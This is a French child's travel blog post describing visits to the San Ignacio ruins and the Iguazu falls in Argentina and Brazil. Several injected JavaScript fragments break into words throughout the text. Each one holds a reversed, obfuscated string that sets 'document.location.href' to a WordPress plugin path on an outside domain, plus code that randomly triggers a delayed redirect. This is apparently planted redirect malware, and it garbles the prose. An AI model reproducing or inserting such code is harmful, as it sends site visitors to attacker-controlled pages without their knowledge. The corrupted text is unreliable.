J’adore Iguazu !!

by Alice

Lundi on est arrivé à San Ignacio, on a visité les ruines. On a vu un spectacle de son et lumière dans les ruines. en gros on a visité les ruines la nuit toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout en écoutant l’histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire de ces ruines et on a regardé des gens en 3D c’était trop bien !

Ensuite le lendemain on a visité le musée des ruines, puis les ruines en plein jour puis on est arrivé à Puertoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Iguazu.

On a vu un petit spectacle d’eau et ensuite on a dormi devant un parc. C’est une mauvaise idée, il y avait des ados qui écoutaient la musique à fond du coup on entendait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la musique. Du coup on a mal dormi malgré les boules quiès, et pendant les quelques heures où j’ai dormi papa et maman ont changé de place.

Aujourd’hui on est allé aux chutes d’Iguazu c’était trop beau et surtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout celle du diable qui fait un boucan infernal. Il fallait prendre un petit train pour y allait mais au retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour j’ai perdu ma casquette sur les rails, du coup papa est allé la chercher mais il ne l’a pas trouvé donc on a acheté la même. Là on est dans un camping et on a trouvé des enfants du coup on se parle avec des gestes c’est trop rigolo.

Jeudi on a vu les chutes côté Brésil, c’était plutôt panoramique !!! On s’est bien fait mouiller car on était sous les cascades.